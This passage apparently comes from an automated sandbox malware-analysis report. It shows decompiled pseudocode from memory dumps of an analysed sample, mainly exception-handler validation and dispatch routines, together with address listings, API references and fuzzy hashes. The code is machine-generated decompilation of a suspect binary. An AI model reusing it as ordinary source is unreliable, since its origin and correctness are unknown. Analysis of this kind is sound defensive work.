								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00d9b117
0x00d9b11a
0x00d9b120
0x00d9b13e
0x00000000
0x00d9b13e
0x00d9b128
0x00d9b131
0x00d9b137
0x00d9b146
0x00d9b149
0x00d9b14c
0x00d9b156
0x00d9b156
0x00d9b158
0x00d9b15b
0x00d9b15d
0x00d9b15d
0x00d9b15f
0x00d9b162
0x00000000
0x00000000
0x00d9b164
0x00d9b166
0x00d9b1cc
0x00d9b1cc
0x00d9b32a
0x00000000
0x00d9b32a
0x00d9b168
0x00d9b168
0x00d9b16c
0x00d9b16e
0x00d9b16e
0x00d9b16e
0x00d9b16e
0x00d9b171
0x00d9b172
0x00d9b175
0x00d9b175
0x00d9b179
0x00d9b17d
0x00d9b18b
0x00d9b18b
0x00d9b193
0x00d9b199
0x00d9b19b
0x00d9b19d
0x00d9b1ad
0x00d9b1ba
0x00d9b1be
0x00d9b1c3
0x00d9b1c5
0x00d9b243
0x00d9b243
0x00d9b1c7
0x00d9b1c7
0x00d9b1c7
0x00d9b245
0x00d9b247
0x00d9b328
0x00d9b328
0x00000000
0x00d9b24d
0x00d9b24d
0x00d9b254
0x00000000
0x00000000
0x00d9b25a
0x00d9b25e
0x00d9b2ba
0x00d9b2bc
0x00d9b2c4
0x00d9b2c6
0x00d9b2c8
0x00000000
0x00000000
0x00d9b2ca
0x00d9b2d0
0x00d9b2d2
0x00d9b2d4
0x00d9b2e9
0x00d9b2e9
0x00d9b2eb
0x00d9b31a
0x00d9b321
0x00000000
0x00d9b321
0x00d9b2ef
0x00d9b2f0
0x00d9b2f2
0x00d9b2f4
0x00d9b2f4
0x00d9b2f6
0x00d9b2f8
0x00d9b2fa
0x00d9b30e
0x00d9b30e
0x00d9b311
0x00d9b313
0x00d9b313
0x00d9b314
0x00d9b314
0x00000000
0x00d9b2fc
0x00d9b2fc
0x00d9b2fc
0x00d9b305
0x00d9b306
0x00d9b308
0x00d9b30a
0x00d9b30a
0x00000000
0x00d9b2fc
0x00d9b2fa
0x00d9b2d6
0x00d9b2dd
0x00d9b2dd
0x00d9b2df
0x00000000
0x00000000
0x00d9b2e1
0x00d9b2e2
0x00d9b2e5
0x00d9b2e7
0x00000000
0x00000000
0x00000000
0x00d9b2e7
0x00000000
0x00d9b2dd
0x00d9b260
0x00d9b263
0x00d9b268
0x00000000
0x00000000
0x00d9b271
0x00d9b273
0x00d9b279
0x00000000
0x00000000
0x00d9b27f
0x00d9b285
0x00000000
0x00000000
0x00d9b28b
0x00d9b28d
0x00d9b296
0x00d9b29a
0x00000000
0x00000000
0x00d9b2a0
0x00d9b2a3
0x00d9b2a5
0x00000000
0x00000000
0x00d9b2ac
0x00d9b2ae
0x00000000
0x00000000
0x00d9b2b0
0x00d9b2b4
0x00000000
0x00000000
0x00000000
0x00d9b2b4
0x00000000
0x00000000
0x00000000
0x00d9b19f
0x00d9b19f
0x00d9b19f
0x00d9b1a6
0x00000000
0x00000000
0x00d9b1a8
0x00d9b1a9
0x00d9b1ab
0x00000000
0x00000000
0x00000000
0x00d9b1ab
0x00d9b1d3
0x00d9b1d5
0x00000000
0x00000000
0x00d9b1e5
0x00d9b1e7
0x00d9b1e9
0x00000000
0x00000000
0x00d9b1ef
0x00d9b1f6
0x00d9b222
0x00d9b222
0x00d9b224
0x00d9b226
0x00d9b23a
0x00d9b23c
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9b228
0x00d9b228
0x00d9b228
0x00d9b231
0x00d9b232
0x00d9b234
0x00d9b236
0x00d9b236
0x00000000
0x00d9b228
0x00d9b1f8
0x00d9b1f8
0x00d9b1fb
0x00d9b1fd
0x00d9b20f
0x00d9b20f
0x00d9b212
0x00d9b214
0x00d9b214
0x00d9b215
0x00d9b215
0x00d9b21b
0x00d9b21b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9b1ff
0x00d9b1ff
0x00d9b1ff
0x00d9b206
0x00000000
0x00000000
0x00d9b208
0x00d9b208
0x00d9b209
0x00000000
0x00000000
0x00000000
0x00d9b209
0x00d9b20b
0x00d9b20d
0x00d9b220
0x00000000
0x00000000
0x00000000
0x00d9b220
0x00000000
0x00d9b20d
0x00d9b17f
0x00d9b182
0x00d9b185
0x00000000
0x00000000
0x00d9b187
0x00d9b189
0x00000000
0x00000000
0x00000000
0x00d9b189
0x00d9b14e
0x00d9b150
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00D9B1BE

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 2eaaf20751928bd9442765df6dd4f14205cd7a43e5c562c8c272d2cbdc5e8ffc
Instruction ID: 3726cc020895cdfbf71e42ac049792c22bd91bf46f88f659016ef9645c5b8138
Opcode Fuzzy Hash: 2eaaf20751928bd9442765df6dd4f14205cd7a43e5c562c8c272d2cbdc5e8ffc
Instruction Fuzzy Hash: 9D61B131B007069FDF29CF29EA9063973A2EB85374B6A852BD845D7294E730DC42C778

Uniqueness

Uniqueness Score: -1.00%

Function 005123F5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005123F5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x514178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x5141c0 = 1;
										__eflags =  *0x5141c0;
										if( *0x5141c0 != 0) {
											goto L60;
										}
										_t84 =  *0x514178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x5141c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x514178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x514180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x51417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x514180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x514180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x5141c0 = 1;
							__eflags =  *0x5141c0;
							if( *0x5141c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x514180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x514180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x5141c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x514180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x514178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x514180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x514180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x005123ff
0x00512402
0x00512408
0x00512426
0x00000000
0x00512426
0x00512410
0x00512419
0x0051241f
0x0051242e
0x00512431
0x00512434
0x0051243e
0x0051243e
0x00512440
0x00512443
0x00512445
0x00512445
0x00512447
0x0051244a
0x00000000
0x00000000
0x0051244c
0x0051244e
0x005124b4
0x005124b4
0x00512612
0x00000000
0x00512612
0x00512450
0x00512450
0x00512454
0x00512456
0x00512456
0x00512456
0x00512456
0x00512459
0x0051245a
0x0051245d
0x0051245d
0x00512461
0x00512465
0x00512473
0x00512473
0x0051247b
0x00512481
0x00512483
0x00512485
0x00512495
0x005124a2
0x005124a6
0x005124ab
0x005124ad
0x0051252b
0x0051252b
0x005124af
0x005124af
0x005124af
0x0051252d
0x0051252f
0x00512610
0x00512610
0x00000000
0x00512535
0x00512535
0x0051253c
0x00000000
0x00000000
0x00512542
0x00512546
0x005125a2
0x005125a4
0x005125ac
0x005125ae
0x005125b0
0x00000000
0x00000000
0x005125b2
0x005125b8
0x005125ba
0x005125bc
0x005125d1
0x005125d1
0x005125d3
0x00512602
0x00512609
0x00000000
0x00512609
0x005125d7
0x005125d8
0x005125da
0x005125dc
0x005125dc
0x005125de
0x005125e0
0x005125e2
0x005125f6
0x005125f6
0x005125f9
0x005125fb
0x005125fb
0x005125fc
0x005125fc
0x00000000
0x005125e4
0x005125e4
0x005125e4
0x005125ed
0x005125ee
0x005125f0
0x005125f2
0x005125f2
0x00000000
0x005125e4
0x005125e2
0x005125be
0x005125c5
0x005125c5
0x005125c7
0x00000000
0x00000000
0x005125c9
0x005125ca
0x005125cd
0x005125cf
0x00000000
0x00000000
0x00000000
0x005125cf
0x00000000
0x005125c5
0x00512548
0x0051254b
0x00512550
0x00000000
0x00000000
0x00512559
0x0051255b
0x00512561
0x00000000
0x00000000
0x00512567
0x0051256d
0x00000000
0x00000000
0x00512573
0x00512575
0x0051257e
0x00512582
0x00000000
0x00000000
0x00512588
0x0051258b
0x0051258d
0x00000000
0x00000000
0x00512594
0x00512596
0x00000000
0x00000000
0x00512598
0x0051259c
0x00000000
0x00000000
0x00000000
0x0051259c
0x00000000
0x00000000
0x00000000
0x00512487
0x00512487
0x00512487
0x0051248e
0x00000000
0x00000000
0x00512490
0x00512491
0x00512493
0x00000000
0x00000000
0x00000000
0x00512493
0x005124bb
0x005124bd
0x00000000
0x00000000
0x005124cd
0x005124cf
0x005124d1
0x00000000
0x00000000
0x005124d7
0x005124de
0x0051250a
0x0051250a
0x0051250c
0x0051250e
0x00512522
0x00512524
0x00000000
0x00000000
0x00000000
0x00000000
0x00512510
0x00512510
0x00512510
0x00512519
0x0051251a
0x0051251c
0x0051251e
0x0051251e
0x00000000
0x00512510
0x005124e0
0x005124e3
0x005124e5
0x005124f7
0x005124f7
0x005124fa
0x005124fc
0x005124fc
0x005124fd
0x005124fd
0x00512503
0x00000000
0x00000000
0x00000000
0x00000000
0x005124e7
0x005124e7
0x005124e7
0x005124ee
0x00000000
0x00000000
0x005124f0
0x005124f0
0x005124f1
0x00000000
0x00000000
0x00000000
0x005124f1
0x005124f3
0x005124f5
0x00512508
0x00000000
0x00000000
0x00000000
0x00512508
0x00000000
0x005124f5
0x00512467
0x0051246a
0x0051246d
0x00000000
0x00000000
0x0051246f
0x00512471
0x00000000
0x00000000
0x00000000
0x00512471
0x00512436
0x00512438
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005124A6

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 0daf505e52a6b2a7542733ba7cc1bd8e7030a49cd00b2a7296afaa8ed91da9b7
Instruction ID: 121293e22488b5ec9873aff2e48a9e84d229c85bef24527a10b6ccf6fc878e67
Opcode Fuzzy Hash: 0daf505e52a6b2a7542733ba7cc1bd8e7030a49cd00b2a7296afaa8ed91da9b7
Instruction Fuzzy Hash: B961C2306006169FFF29CF29D8E06E97FA6FBA5354F258429D846CB191E770DCE2CA50

Uniqueness

Uniqueness Score: -1.00%

Function 004F009C, Relevance: 1.6, Strings: 1, Instructions: 346COMMON

Download Yara Rule

Strings

t32c, xrefs: 004F0586

Memory Dump Source

Source File: 00000001.00000002.599937448.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: t32c
API String ID: 0-3674199949
Opcode ID: f2ebc4c6a48cfe5601a6ace997b79ecf8ae29c40ddede3ccd54cfb746bfe7157
Instruction ID: 339de23eec2a2915a8b245f2fd5247ecaffbe95dccc65661cb972fa4d8981b79
Opcode Fuzzy Hash: f2ebc4c6a48cfe5601a6ace997b79ecf8ae29c40ddede3ccd54cfb746bfe7157
Instruction Fuzzy Hash: D0D10576A0021DEFDF24CB90CD80BAAB7B5FF89314F148196D609A7212D334AE85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004F03AC, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.599937448.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03878353c38bb053fef0567d2f1903d33a8bc55c5f329362ce4d1c21dfb157c7
Instruction ID: cb27b56745385186f4374874a18c497357963258bec44e58cdbe6ca61935c119
Opcode Fuzzy Hash: 03878353c38bb053fef0567d2f1903d33a8bc55c5f329362ce4d1c21dfb157c7
Instruction Fuzzy Hash: B7411B72A0021DDFDF20CF44C880BAAB3B5FB88314F599596DA49A7216D374EE85CF85

Uniqueness

Uniqueness Score: -1.00%

Function 004F0476, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.599937448.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 394b649e328b1df1404da37bd1b9a63264ebc17e19e9de328f3921affac317c7
Instruction ID: b3bd752cb7ee7edf424e3f6ff101f0ccf67b17bffe01927729e39a4ce2ee1c4e
Opcode Fuzzy Hash: 394b649e328b1df1404da37bd1b9a63264ebc17e19e9de328f3921affac317c7
Instruction Fuzzy Hash: 56314376A00219DFDB20CF54C880BAAB7B1FF88320F189595DA496B216C374EE81CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00D9AEEC, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00D9AEEC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00D9B053(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00D9B10D(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00D9AFF8(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00D9B053(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00D9B0EF(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00d9aef0
0x00d9aef1
0x00d9aef2
0x00d9aef5
0x00d9aef7
0x00d9aefa
0x00d9aefb
0x00d9aefd
0x00d9aefe
0x00d9aeff
0x00d9af02
0x00d9af0c
0x00d9afbd
0x00d9afc4
0x00d9afcd
0x00d9af12
0x00d9af12
0x00d9af18
0x00d9af1e
0x00d9af21
0x00d9af24
0x00d9af28
0x00d9af2d
0x00d9af32
0x00d9afb2
0x00000000
0x00d9af34
0x00d9af34
0x00d9af40
0x00d9af42
0x00d9af9d
0x00d9af9d
0x00d9afa3
0x00000000
0x00d9af44
0x00d9af53
0x00d9af55
0x00d9af56
0x00d9af57
0x00d9af5a
0x00d9af5a
0x00d9af5c
0x00000000
0x00d9af5e
0x00d9af5e
0x00d9afa8
0x00d9af60
0x00d9af60
0x00d9af64
0x00d9af6c
0x00d9af71
0x00d9af76
0x00d9af82
0x00d9af8a
0x00d9af91
0x00d9af97
0x00d9af9b
0x00000000
0x00d9af9b
0x00d9af5e
0x00d9af5c
0x00000000
0x00d9af42
0x00d9afb6
0x00d9afb6
0x00d9afb6
0x00d9af32
0x00d9afd2
0x00d9afd9

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 12f19ac9d06829eacb4a831d191342fbc119fe1ad3fa3f49207de4c89b063d98
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 222174739002049FCF14EF68C8819A7BBA5FF45360B4A81A9E95A9B245E730F915C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 005121D4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E005121D4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0051233B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E005123F5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E005122E0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0051233B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E005123D7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x005121d8
0x005121d9
0x005121da
0x005121dd
0x005121df
0x005121e2
0x005121e3
0x005121e5
0x005121e6
0x005121e7
0x005121ea
0x005121f4
0x005122a5
0x005122ac
0x005122b5
0x005121fa
0x005121fa
0x00512200
0x00512206
0x00512209
0x0051220c
0x00512210
0x00512215
0x0051221a
0x0051229a
0x00000000
0x0051221c
0x0051221c
0x00512228
0x0051222a
0x00512285
0x00512285
0x0051228b
0x00000000
0x0051222c
0x0051223b
0x0051223d
0x0051223e
0x0051223f
0x00512242
0x00512242
0x00512244
0x00000000
0x00512246
0x00512246
0x00512290
0x00512248
0x00512248
0x0051224c
0x00512254
0x00512259
0x0051225e
0x0051226a
0x00512272
0x00512279
0x0051227f
0x00512283
0x00000000
0x00512283
0x00512246
0x00512244
0x00000000
0x0051222a
0x0051229e
0x0051229e
0x0051229e
0x0051221a
0x005122ba
0x005122c1

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 8a69a14f26d9bddaecbf78e0d4bc6e2e34ff0f77081acdcc80fc8876b43f2371
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 482106369002059BEB14DF68C8849EBBFA5FF88310F468468E8258B245D730FA65CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 004F0066, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.599937448.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
Instruction ID: 48ecb0119360c2cf02584a7dd325e82a54f0792c686e397cc8a67155876b7d7e
Opcode Fuzzy Hash: 6d6af18e62d48141748dec560edc45937fa8636c77b1ce60b66d1111b4985eae
Instruction Fuzzy Hash: B8E0B6B1A00118EEEF15CA40CC40FF6B7BDEBC9700F0481D6A60CAA150D6306E848F60

Uniqueness

Uniqueness Score: -1.00%

Function 004F029D, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.599937448.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
Instruction ID: 3ed7eaa47dd1c20e4d8171cec1f7494fb3ca1d770babfe9f77537e98203552ce
Opcode Fuzzy Hash: 981ae7a2e560dead5f088f94c0b916592ccfa2d749defbc40be1ee7aea399cb3
Instruction Fuzzy Hash: 46D09235E0026C9FCF20CA50C810BABF3B2BF9A360F5640C9D9083730187302E82CE51

Uniqueness

Uniqueness Score: -1.00%

Function 00D987B0, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 172
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00D987B0(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
